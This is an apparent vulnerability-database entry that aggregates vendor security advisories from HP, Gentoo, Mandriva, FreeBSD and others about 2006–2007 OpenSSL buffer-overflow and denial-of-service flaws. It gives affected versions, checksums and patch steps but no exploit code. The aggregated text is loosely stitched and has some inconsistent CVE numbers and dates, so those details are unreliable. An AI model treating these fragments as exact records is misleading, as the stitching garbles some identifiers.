      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2006-09-28T00:00:00",
            "db": "CERT/CC",
            "id": "VU#386964"
          },
          {
            "date": "2006-09-11T00:00:00",
            "db": "CERT/CC",
            "id": "VU#845620"
          },
          {
            "date": "2006-09-28T00:00:00",
            "db": "CERT/CC",
            "id": "VU#547300"
          },
          {
            "date": "2006-09-28T00:00:00",
            "db": "BID",
            "id": "20249"
          },
          {
            "date": "2007-10-09T00:39:04",
            "db": "PACKETSTORM",
            "id": "59899"
          },
          {
            "date": "2006-10-04T20:17:01",
            "db": "PACKETSTORM",
            "id": "50595"
          },
          {
            "date": "2006-10-04T00:47:19",
            "db": "PACKETSTORM",
            "id": "50543"
          },
          {
            "date": "2007-01-13T22:56:30",
            "db": "PACKETSTORM",
            "id": "53566"
          },
          {
            "date": "2007-04-19T00:58:08",
            "db": "PACKETSTORM",
            "id": "56053"
          },
          {
            "date": "2006-10-04T00:44:50",
            "db": "PACKETSTORM",
            "id": "50535"
          },
          {
            "date": "2006-10-04T01:20:54",
            "db": "PACKETSTORM",
            "id": "50560"
          },
          {
            "date": "2007-01-27T02:35:42",
            "db": "PACKETSTORM",
            "id": "53990"
          },
          {
            "date": "2007-08-08T07:19:47",
            "db": "PACKETSTORM",
            "id": "58346"
          },
          {
            "date": "2006-10-04T00:46:38",
            "db": "PACKETSTORM",
            "id": "50548"
          },
          {
            "date": "2001-10-16T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-200609-536"
          },
          {
            "date": "2007-04-01T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2006-000594"
          },
          {
            "date": "2006-09-28T18:07:00",
            "db": "NVD",
            "id": "CVE-2006-3738"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2011-07-22T00:00:00",
            "db": "CERT/CC",
            "id": "VU#386964"
          },
          {
            "date": "2007-02-08T00:00:00",
            "db": "CERT/CC",
            "id": "VU#845620"
          },
          {
            "date": "2011-07-22T00:00:00",
            "db": "CERT/CC",
            "id": "VU#547300"
          },
          {
            "date": "2011-05-09T19:52:00",
            "db": "BID",
            "id": "20249"
          },
          {
            "date": "2022-02-18T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-200609-536"
          },
          {
            "date": "2008-12-09T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2006-000594"
          },
          {
            "date": "2025-04-09T00:30:58.490000",
            "db": "NVD",
            "id": "CVE-2006-3738"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "PACKETSTORM",
            "id": "56053"
          },
          {
            "db": "PACKETSTORM",
            "id": "50535"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200609-536"
          }
        ],
        "trust": 0.8
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "OpenSSL SSLv2 client code fails to properly check for NULL",
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#386964"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "buffer error",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-200609-536"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-200110-0190

    Vulnerability from variot - Updated: 2025-10-01 22:48

    Buffer overflow in the SSL_get_shared_ciphers function in OpenSSL 0.9.7 before 0.9.7l, 0.9.8 before 0.9.8d, and earlier versions has unspecified impact and remote attack vectors involving a long list of ciphers. The Oracle SYS.DBMS_AQ package is vulnerable to PL/SQL injection. This vulnerability may allow a remote, authenticated attacker to execute arbitrary PL/SQL commands on a vulnerable Oracle installation. OpenSSL Library utility functions 1 First, output a list of encryption algorithms used for communication as a readable character string. SSL_get_shared_ciphers() there is. SSL_get_shared_ciphers() There is a buffer overflow vulnerability in the processing of.OpenSSL Any code may be executed with the privileges of the application that uses it. Multiple RSA implementations fail to properly handle RSA signatures. This vulnerability may allow an attacker to forge RSA signatures. Successfully exploiting this issue may result in the execution of arbitrary machine code in the context of applications that use the affected library. Failed exploit attempts may crash applications, denying service to legitimate users. Oracle has released a Critical Patch Update advisory for January 2007 to address these vulnerabilities for supported releases. Earlier unsupported releases are likely to be affected by these issues as well. The issues identified by the vendor affect all security properties of the Oracle products and present local and remote threats. Various levels of authorization are needed to leverage some of the issues, but other issues do not require any authorization. The most severe of the vulnerabilities could possibly expose affected computers to complete compromise. A flaw has also been reported in the BN_from_montgomery() function in crypto/bn/bn_mont.c when performing Montgomery multiplication. A local attacker could perform a side channel attack to retrieve the RSA private keys. rPath Security Advisory: 2006-0175-1 Published: 2006-09-28 Products: rPath Linux 1 Rating: Major Exposure Level Classification: Remote Deterministic Unauthorized Access Updated Versions: openssl=/conary.rpath.com@rpl:devel//1/0.9.7f-10.4-1 openssl-scripts=/conary.rpath.com@rpl:devel//1/0.9.7f-10.4-1

    References: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2937 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2940 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3738 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4343 http://issues.rpath.com/browse/RPL-613

    Description: Previous versions of the openssl package are vulnerable to multiple attacks. In particular, any connection that the mysql daemon will accept may be vulnerable. In the default configuration of mysql, that would be a local unauthorized access vulnerability, but mysql can be configured to listen for network connections from remote hosts, which would then enable remote unauthorized access. Any program that calls the SSL_get_shared_ciphers() function may be vulnerable.


    Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ . ASN.1 Denial of Service Attack (1/2)

     During the parsing of certain invalid ASN.1 structures an error
     condition is mishandled. This can result in an infinite loop which
     consumes system memory. The Common Vulnerabilities and Exposures
     (CVE) project assigned the id CVE-2006-2937 [2] to the problem. ASN.1 Denial of Service Attack (2/2)
    
     Certain types of public key can take disproportionate amounts of
     time to process. This could be used by an attacker in a denial of
     service attack. The Common Vulnerabilities and Exposures (CVE)
     project assigned the id CVE-2006-2940 [3] to the problem. SSL_get_shared_ciphers() Buffer Overflow
    
     A buffer overflow was discovered in the SSL_get_shared_ciphers()
     utility function. The
     Common Vulnerabilities and Exposures (CVE) project assigned the id
     CVE-2006-3780 [4] to the problem. SSLv2 Client Crash
    
     A flaw in the SSLv2 client code was discovered. The
     Common Vulnerabilities and Exposures (CVE) project assigned the id
     CVE-2006-4343 [5] to the problem.
    

    References: [0] http://www.openssl.org/news/secadv_20060928.txt [1] http://www.openssl.org/ [2] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2937 [3] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2940 [4] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3738 [5] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4343


    For security reasons, this advisory was digitally signed with the OpenPGP public key "OpenPKG openpkg@openpkg.org" (ID 63C4CB9F) of the OpenPKG project which you can retrieve from http://pgp.openpkg.org and hkp://pgp.openpkg.org. Follow the instructions on http://pgp.openpkg.org for details on how to verify the integrity of this advisory. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1

    SUPPORT COMMUNICATION - SECURITY BULLETIN

    Document ID: c00849540 Version: 1

    HPSBUX02186 SSRT071299 rev.1 - HP-UX running Apache Remote Execution of Arbitrary Code, Denial of Service (DoS), Unauthorized Access

    NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

    Release Date: 2007-01-17 Last Updated: 2007-01-23

    Potential Security Impact: Remote execution of arbitrary code, Denial of Service (DoS), and unauthorized access.

    Source: Hewlett-Packard Company, HP Software Security Response Team

    VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with Apache running on HP-UX. These vulnerabilities could be exploited remotely to allow execution of arbitrary code, Denial of Service (DoS), or unauthorized access.

    References: CVE-2006-2940, CVE-2006-2937, CVE-2006-3738, CVE-2006-4343, CVE-2006-4339, CVE-2005-2969.

    SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP-UX B.11.11, B.11.23, and B.11.31 running Apache-based Web Server prior to v.2.0.58.01

    BACKGROUND

    AFFECTED VERSIONS

    For IPv4: HP-UX B.11.00 HP-UX B.11.11 =========== hpuxwsAPACHE action: install revision A.2.0.58.01 or subsequent restart Apache URL:http://h20293.www2.hp.com/cgi-bin/swdepot_parser.cgi/cgi/displayProductInfo.pl?productNumber=HPUXWSSUITE

    For IPv6: HP-UX B.11.11 =========== hpuxwsAPACHE,revision=B.1.0.00.01 hpuxwsAPACHE,revision=B.1.0.07.01 hpuxwsAPACHE,revision=B.1.0.08.01 hpuxwsAPACHE,revision=B.1.0.09.01 hpuxwsAPACHE,revision=B.1.0.10.01 hpuxwsAPACHE,revision=B.2.0.48.00 hpuxwsAPACHE,revision=B.2.0.49.00 hpuxwsAPACHE,revision=B.2.0.50.00 hpuxwsAPACHE,revision=B.2.0.51.00 hpuxwsAPACHE,revision=B.2.0.52.00 hpuxwsAPACHE,revision=B.2.0.53.00 hpuxwsAPACHE,revision=B.2.0.54.00 hpuxwsAPACHE,revision=B.2.0.55.00 hpuxwsAPACHE,revision=B.2.0.56.00 hpuxwsAPACHE,revision=B.2.0.58.00 action: install revision B.2.0.58.01 or subsequent restart Apache URL:http://h20293.www2.hp.com/cgi-bin/swdepot_parser.cgi/cgi/displayProductInfo.pl?productNumber=HPUXWSSUITE

    HP-UX B.11.23

    hpuxwsAPACHE action: install revision B.2.0.58.01 or subsequent restart Apache URL:http://h20293.www2.hp.com/cgi-bin/swdepot_parser.cgi/cgi/displayProductInfo.pl?productNumber=HPUXWSSUITE

    END AFFECTED VERSIONS

    RESOLUTION

    HP has made the following software updates available to resolve the issue. Software updates for the Apache-based Web Server are available from: http://h20293.www2.hp.com/cgi-bin/swdepot_parser.cgi/cgi/displayProductInfo.pl?productNumber=HPUXWSSUITE

    HP-UX B.11.00, B.11.11 and HP-UX B.11.23 require the Apache-based Web Server v.2.0.58.01 or subsequent.

    Apache Update Procedure

    Check for Apache Installation


    To determine if the Apache web server from HP is installed on your system, use Software Distributor's swlist command. All three revisions of the product may co-exist on a single system. For example, the results of the command swlist -l product | grep -I apache hpuxwsAPACHE B.2.0.55.00 HP-UX Apache-based Web Server

    Stop Apache


    Before updating, make sure the previous Apache binary is stopped. If Apache is not stopped, the installation would be successful but the new version would be prevented from starting until a later time. After determining which Apache is installed, stop Apache with the following commands: for hpuxwsAPACHE: /opt/hpws/apache[32]/bin/apachectl stop

    Download and Install Apache


    Download Apache from Software Depot. http://h20293.www2.hp.com/cgi-bin/swdepot_parser.cgi/cgi/displayProductInfo.pl?productNumber=HPUXWSSUITE Verify successful download by comparing the cksum with the value specified on the installation web page. Use SD to swinstall the depot. Installation of this new revision of HP Apache over an existing HP Apache installation is supported, while installation over a non-HP Apache is NOT supported.

    Removing Apache Installation


    The potential vulnerability can also be resolved by removing Apache rather than installing a newer revision. To remove Apache use both Software Distributor's "swremove" command and also "rm -rf" the home location as specified in the rc.config.d file "HOME" variables. %ls /etc/rc.config.d | \ grep apache hpapache2conf hpws_apache[32]conf

    MANUAL ACTIONS: Yes - Update plus other actions Install the revision of the product.

    PRODUCT SPECIFIC INFORMATION HP-UX Security Patch Check: Security Patch Check revision B.02.00 analyzes all HP-issued Security Bulletins to provide a subset of recommended actions that potentially affect a specific HP-UX system. For more information: http://software.hp.com/portal/swdepot/displayProductInfo.do?productNumber=B6834AA

    HISTORY: rev.1 - 23 January 2007 Initial Release

    Third Party Security Patches: Third party security patches which are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.

    Support: For further information, contact normal HP Services support channel.

    Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. To get the security-alert PGP key, please send an e-mail message as follows: To: security-alert@hp.com Subject: get key

    Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email: http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC On the web page: ITRC security bulletins and patch sign-up Under Step1: your ITRC security bulletins and patches - check ALL categories for which alerts are required and continue. Under Step2: your ITRC operating systems - verify your operating system selections are checked and save.

    To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php Log in on the web page: Subscriber's choice for Business: sign-in. On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections.

    To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do

    • The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title:

    GN = HP General SW MA = HP Management Agents MI = Misc. 3rd Party SW MP = HP MPE/iX NS = HP NonStop Servers OV = HP OpenVMS PI = HP Printing & Imaging ST = HP Storage SW TL = HP Trusted Linux TU = HP Tru64 UNIX UX = HP-UX VV = HP VirtualVault

    System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions.

    "HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement."

    \xa9Copyright 2007 Hewlett-Packard Development Company, L.P.

    Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.

    -----BEGIN PGP SIGNATURE----- Version: PGP 8.1

    iQA/AwUBRbc7fOAfOvwtKn1ZEQJs6ACg9AMS2ZtEgsaZh7T9e8Q0OgyfmEQAni1I otH/juFiPayhwdxQwX1pZwdm =e4BA -----END PGP SIGNATURE----- . HP Secure Web Server (SWS) for OpenVMS (based on Apache) V2.1-1 and earlier.

    BACKGROUND

    CVSS 2.0 Base Metrics

    Reference Base Vector Base Score CVE-2002-0839 (AV:L/AC:L/Au:N/C:C/I:C/A:C) 7.2 CVE-2002-0840 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8 CVE-2003-0542 (AV:L/AC:L/Au:N/C:C/I:C/A:C) 7.2 CVE-2004-0492 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2005-2491 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2005-3352 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3 CVE-2005-3357 (AV:N/AC:H/Au:N/C:N/I:N/A:C) 5.4 CVE-2006-2937 (AV:N/AC:L/Au:N/C:N/I:N/A:C) 7.8 CVE-2006-2940 (AV:N/AC:L/Au:N/C:N/I:N/A:C) 7.8 CVE-2006-3738 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2006-3747 (AV:N/AC:H/Au:N/C:C/I:C/A:C) 7.6 CVE-2006-3918 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3 CVE-2006-4339 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3 CVE-2006-4343 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3 CVE-2007-5000 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3 CVE-2007-6388 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3 CVE-2008-0005 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3 CVE-2009-1891 (AV:N/AC:M/Au:N/C:N/I:N/A:C) 7.1 CVE-2009-3095 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2009-3291 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2009-3292 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2009-3293 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2009-3555 (AV:N/AC:M/Au:N/C:N/I:P/A:P) 5.8 CVE-2010-0010 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002

    RESOLUTION

    HP has made the following software updates available to resolve these vulnerabilities.

    Kit Name Location

    HP SWS V2.2 for OpenVMS Alpha and OpenVMS Integrity servers. HP System Management Homepage (SMH) versions prior to 2.1.7 running on Linux and Windows.

    BACKGROUND

    RESOLUTION HP has provided System Management Homepage (SMH) version 2.1.7 or subsequent for each platform to resolve this issue. --WfZ7S8PLGjBY9Voh Content-Type: text/plain; charset=us-ascii Content-Disposition: inline


    Gentoo Linux Security Advisory GLSA 200610-11


                                            http://security.gentoo.org/
    

    Severity: High Title: OpenSSL: Multiple vulnerabilities Date: October 24, 2006 Bugs: #145510 ID: 200610-11


    Synopsis

    OpenSSL contains multiple vulnerabilities including the possible remote execution of arbitrary code. Additionally Dr. Stephen N.

    Resolution

    All OpenSSL 0.9.8 users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=dev-libs/openssl-0.9.8d"
    

    All OpenSSL 0.9.7 users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=dev-libs/openssl-0.9.7l"
    

    References

    [ 1 ] CVE-2006-2937 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2937 [ 2 ] CVE-2006-2940 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2940 [ 3 ] CVE-2006-3738 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3738 [ 4 ] CVE-2006-4343 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4343

    Availability

    This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

    http://security.gentoo.org/glsa/glsa-200610-11.xml

    Concerns?

    Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org.

    License

    Copyright 2006 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

    The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. (CVE-2006-4343)

    Updated packages are patched to address these issues.


    References:

    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2937 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2940 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3738 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4343


    Updated Packages:

    Mandriva Linux 2006.0: 17e2d82c3f6c0afbf48eccbfbcc17b55 2006.0/i586/libopenssl0.9.7-0.9.7g-2.4.20060mdk.i586.rpm 8c3f89e1900f069d4a4ad3162a9f7d78 2006.0/i586/libopenssl0.9.7-devel-0.9.7g-2.4.20060mdk.i586.rpm 3a68c653ba0339ba99162459385c72e2 2006.0/i586/libopenssl0.9.7-static-devel-0.9.7g-2.4.20060mdk.i586.rpm 8291bde3bd9aa95533aabc07280203b8 2006.0/i586/openssl-0.9.7g-2.4.20060mdk.i586.rpm 52b3fbfc1389bcd73e406d6ff741e9dc 2006.0/SRPMS/openssl-0.9.7g-2.4.20060mdk.src.rpm

    Mandriva Linux 2006.0/X86_64: b2ce6e6bb7e3114663d3a074d0cc7da5 2006.0/x86_64/lib64openssl0.9.7-0.9.7g-2.4.20060mdk.x86_64.rpm f7c8dbc2eda0c90547d43661454d1068 2006.0/x86_64/lib64openssl0.9.7-devel-0.9.7g-2.4.20060mdk.x86_64.rpm 7c9ebd9f9179f4e93627dcf0f3442335 2006.0/x86_64/lib64openssl0.9.7-static-devel-0.9.7g-2.4.20060mdk.x86_64.rpm 17e2d82c3f6c0afbf48eccbfbcc17b55 2006.0/x86_64/libopenssl0.9.7-0.9.7g-2.4.20060mdk.i586.rpm 8c3f89e1900f069d4a4ad3162a9f7d78 2006.0/x86_64/libopenssl0.9.7-devel-0.9.7g-2.4.20060mdk.i586.rpm 3a68c653ba0339ba99162459385c72e2 2006.0/x86_64/libopenssl0.9.7-static-devel-0.9.7g-2.4.20060mdk.i586.rpm 6ce5832a59b8b67425cb7026ea9dc876 2006.0/x86_64/openssl-0.9.7g-2.4.20060mdk.x86_64.rpm 52b3fbfc1389bcd73e406d6ff741e9dc 2006.0/SRPMS/openssl-0.9.7g-2.4.20060mdk.src.rpm

    Mandriva Linux 2007.0: 1bfeff47c8d2f6c020c459881be68207 2007.0/i586/libopenssl0.9.8-0.9.8b-2.1mdv2007.0.i586.rpm 1e1a4db54ddfaedb08a6d847422099ff 2007.0/i586/libopenssl0.9.8-devel-0.9.8b-2.1mdv2007.0.i586.rpm 59c80405f33b2e61ffd3cef025635e21 2007.0/i586/libopenssl0.9.8-static-devel-0.9.8b-2.1mdv2007.0.i586.rpm 3a6657970a2e7661bd869d221a69c8da 2007.0/i586/openssl-0.9.8b-2.1mdv2007.0.i586.rpm aad29e57ddceb66105af5d6434de9a62 2007.0/SRPMS/openssl-0.9.8b-2.1mdv2007.0.src.rpm

    Mandriva Linux 2007.0/X86_64: af679c647d97214244a8423dc1a766b7 2007.0/x86_64/lib64openssl0.9.8-0.9.8b-2.1mdv2007.0.x86_64.rpm d7b1ed07df4115b3bcc3907e00d25a89 2007.0/x86_64/lib64openssl0.9.8-devel-0.9.8b-2.1mdv2007.0.x86_64.rpm 5bd3ece2c0ec7a3201c29fa84e25a75a 2007.0/x86_64/lib64openssl0.9.8-static-devel-0.9.8b-2.1mdv2007.0.x86_64.rpm 9b028020dba009eddbf06eeb8607b87f 2007.0/x86_64/openssl-0.9.8b-2.1mdv2007.0.x86_64.rpm aad29e57ddceb66105af5d6434de9a62 2007.0/SRPMS/openssl-0.9.8b-2.1mdv2007.0.src.rpm

    Corporate 3.0: c99ea58f6f4959a4c36398cc6b2b4ee2 corporate/3.0/i586/libopenssl0.9.7-0.9.7c-3.6.C30mdk.i586.rpm 98a925c5ba2ecc9d704b1e730035755e corporate/3.0/i586/libopenssl0.9.7-devel-0.9.7c-3.6.C30mdk.i586.rpm 151493a50693e3b9cc67bfafadb9ce42 corporate/3.0/i586/libopenssl0.9.7-static-devel-0.9.7c-3.6.C30mdk.i586.rpm 82b4709bdbb9128746887013a724356a corporate/3.0/i586/openssl-0.9.7c-3.6.C30mdk.i586.rpm a5bdbe6afa52005a734dc18aa951677d corporate/3.0/SRPMS/openssl-0.9.7c-3.6.C30mdk.src.rpm

    Corporate 3.0/X86_64: 01a922d80d6fc9d1b36dde15ee27747e corporate/3.0/x86_64/lib64openssl0.9.7-0.9.7c-3.6.C30mdk.x86_64.rpm 30268f0b70862d1f5998694ac8b4addc corporate/3.0/x86_64/lib64openssl0.9.7-devel-0.9.7c-3.6.C30mdk.x86_64.rpm e0388ff1efa34ea55d033e95b4e9bb63 corporate/3.0/x86_64/lib64openssl0.9.7-static-devel-0.9.7c-3.6.C30mdk.x86_64.rpm c99ea58f6f4959a4c36398cc6b2b4ee2 corporate/3.0/x86_64/libopenssl0.9.7-0.9.7c-3.6.C30mdk.i586.rpm 83759622f0cc8ea9c0f6d32671283354 corporate/3.0/x86_64/openssl-0.9.7c-3.6.C30mdk.x86_64.rpm a5bdbe6afa52005a734dc18aa951677d corporate/3.0/SRPMS/openssl-0.9.7c-3.6.C30mdk.src.rpm

    Corporate 4.0: 6d71d2358738be9967b2dfe19d3642f1 corporate/4.0/i586/libopenssl0.9.7-0.9.7g-2.4.20060mlcs4.i586.rpm 22890554d3096ce596eeec7393ee3fcf corporate/4.0/i586/libopenssl0.9.7-devel-0.9.7g-2.4.20060mlcs4.i586.rpm 679fe740859fa35b2bb77b19c4a0e787 corporate/4.0/i586/libopenssl0.9.7-static-devel-0.9.7g-2.4.20060mlcs4.i586.rpm d8477333b67ec3a36ba46c50e6183993 corporate/4.0/i586/openssl-0.9.7g-2.4.20060mlcs4.i586.rpm b65dbbd9fb3d74d302478640476a2cd2 corporate/4.0/SRPMS/openssl-0.9.7g-2.4.20060mlcs4.src.rpm

    Corporate 4.0/X86_64: 746e5e916d1e05379373138a5db20923 corporate/4.0/x86_64/lib64openssl0.9.7-0.9.7g-2.4.20060mlcs4.x86_64.rpm a2b1d750075a32fe8badbdf1f7febafe corporate/4.0/x86_64/lib64openssl0.9.7-devel-0.9.7g-2.4.20060mlcs4.x86_64.rpm 47c464cf890a004f772c1db3e839fa12 corporate/4.0/x86_64/lib64openssl0.9.7-static-devel-0.9.7g-2.4.20060mlcs4.x86_64.rpm 6d71d2358738be9967b2dfe19d3642f1 corporate/4.0/x86_64/libopenssl0.9.7-0.9.7g-2.4.20060mlcs4.i586.rpm 22890554d3096ce596eeec7393ee3fcf corporate/4.0/x86_64/libopenssl0.9.7-devel-0.9.7g-2.4.20060mlcs4.i586.rpm 679fe740859fa35b2bb77b19c4a0e787 corporate/4.0/x86_64/libopenssl0.9.7-static-devel-0.9.7g-2.4.20060mlcs4.i586.rpm 1030a6124a9fa4fd5a41bdff077301bf corporate/4.0/x86_64/openssl-0.9.7g-2.4.20060mlcs4.x86_64.rpm b65dbbd9fb3d74d302478640476a2cd2 corporate/4.0/SRPMS/openssl-0.9.7g-2.4.20060mlcs4.src.rpm

    Multi Network Firewall 2.0: 19055eda58e1f75814e594ce7709a710 mnf/2.0/i586/libopenssl0.9.7-0.9.7c-3.6.M20mdk.i586.rpm abfe548617969f619aec5b0e807f1f67 mnf/2.0/i586/libopenssl0.9.7-devel-0.9.7c-3.6.M20mdk.i586.rpm 92e7515c9125367a79fdb490f5b39cd4 mnf/2.0/i586/libopenssl0.9.7-static-devel-0.9.7c-3.6.M20mdk.i586.rpm 847eecb1d07e4cab3d1de1452103c3a0 mnf/2.0/i586/openssl-0.9.7c-3.6.M20mdk.i586.rpm b6b67fa82d7119cde7ab7816aed17059 mnf/2.0/SRPMS/openssl-0.9.7c-3.6.M20mdk.src.rpm


    To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.

    All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

    gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

    You can view other update advisories for Mandriva Linux at:

    http://www.mandriva.com/security/advisories

    If you want to report vulnerabilities, please contact

    security_(at)_mandriva.com


    Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.2.2 (GNU/Linux)

    iD8DBQFFHA4hmqjQ0CJFipgRApknAJ9Ybd8xjfkR+RL1fWEI2Fgn/KIuqACeOH/0 wB09L3fylyiHgrXvSV6VL7A= =/+dm -----END PGP SIGNATURE-----

    . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1

    ============================================================================= FreeBSD-SA-07:08.openssl Security Advisory The FreeBSD Project

    Topic: Buffer overflow in OpenSSL SSL_get_shared_ciphers()

    Category: contrib Module: openssl Announced: 2007-10-03 Credits: Moritz Jodeit Affects: All FreeBSD releases. Corrected: 2007-10-03 21:39:43 UTC (RELENG_6, 6.2-STABLE) 2007-10-03 21:40:35 UTC (RELENG_6_2, 6.2-RELEASE-p8) 2007-10-03 21:41:22 UTC (RELENG_6_1, 6.1-RELEASE-p20) 2007-10-03 21:42:00 UTC (RELENG_5, 5.5-STABLE) 2007-10-03 21:42:32 UTC (RELENG_5_5, 5.5-RELEASE-p16) CVE Name: CVE-2007-5135

    For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit .

    I. Background

    FreeBSD includes software from the OpenSSL Project. The OpenSSL Project is a collaborative effort to develop a robust, commercial-grade, full-featured, and Open Source toolkit implementing the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) protocols as well as a full-strength general purpose cryptography library.

    II. Problem Description

    A buffer overflow addressed in FreeBSD-SA-06:23.openssl has been found to be incorrectly fixed.

    III.

    IV. Workaround

    No workaround is available, but only applications using the SSL_get_shared_ciphers() function are affected.

    V. Solution

    Perform one of the following:

    1) Upgrade your vulnerable system to 5-STABLE, or 6-STABLE, or to the RELENG_6_2, RELENG_6_1, or RELENG_5_5 security branch dated after the correction date.

    2) To patch your present system:

    The following patch have been verified to apply to FreeBSD 5.5, 6.1, and 6.2 systems.

    a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility.

    fetch http://security.FreeBSD.org/patches/SA-07:08/openssl.patch

    fetch http://security.FreeBSD.org/patches/SA-07:08/openssl.patch.asc

    b) Execute the following commands as root:

    cd /usr/src

    patch < /path/to/patch

    cd /usr/src/secure/lib/libssl

